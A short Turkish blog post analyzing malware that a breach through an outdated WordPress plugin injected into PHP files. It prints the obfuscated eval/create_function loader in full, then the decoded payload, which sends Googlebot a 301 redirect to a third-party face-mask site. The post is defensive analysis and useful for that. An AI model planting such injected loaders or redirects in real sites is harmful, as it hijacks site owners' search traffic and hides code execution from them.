Eski bir wordpress plug’innin neden olduğu sızmada aşağıdaki kod php betiklerinin başına eklenmiş.
1 |
<? $oO0="cr"."eat"."e_fun"."cti"."on";$o0O=@$oO0('$x','ev'.'al'.'("?>".gz'.'inf'.'late'.'( bas'.'e64'.'_de'.'co'.'de($x)));');@$o0O("s7EvyCjg5cpM0yguKSrIL9ZQiQ92DQpzDYpW9wgJCYgPBfLiHd1d/ULUY3WU8vPTc1KT8kuUNDWrebk4M1ITU1KLNJRAKvUN9QwVjA0MFXzzy1JTFAJSi3IT81LzSnIqlTStkdT65CcnlmTm51kpZJSUFBRb6euXl5frpSUmp+YmFmcb5+ZZmuol5+cCNaVkpgI11vJy2dsBAA=="); |
Koda baktığımızda eval işlemini yapan fonksiyonun okunmasını zorlaştırmak için parçalandığı göze çarpıyor. eval fonksiyonu ise gz (Gnome Zip) ve ardından base64 ile kodlanmış PHP kodunu execute ediyor. Zararlı kodu görmek içip eval’i iptal ederek kodu çalıştırdım:
1 |
echo gzinflate(base64_decode("s7EvyCjg5cpM0yguKSrIL9ZQiQ92DQpzDYpW9wgJCYgPBfLiHd1d/ULUY3WU8vPTc1KT8kuUNDWrebk4M1ITU1KLNJRAKvUN9QwVjA0MFXzzy1JTFAJSi3IT81LzSnIqlTStkdT65CcnlmTm51kpZJSUFBRb6euXl5frpSUmp+YmFmcb5+ZZmuol5+cCNaVkpgI11vJy2dsBAA==")); |
Kodu çıktısı aşağıdaki gibi:
1 2 3 4 5 6 |
<?php if(strpos($_SERVER['HTTP_USER_AGENT'],"ooglebot")){ header("HTTP/1.1 301 Moved Permanently"); header("Location: https://www.facemask3mn95.com");die; } ?> |
Görünüşe göre, zararlı arkadaş google bot’larını www.facemask3mn95.com adresine yönlendirmekte. Bu yönlendirmeyi ise “site kalıcı olarak şu adrese taşındı” manasına gelen HTTP 301 kodu ile yapması. Web ziyaretçi sayısında anormal düşüşler görürseniz bu tarz bir saldırıya maruz kalmış olabilirsiniz. Dikkatli olun.
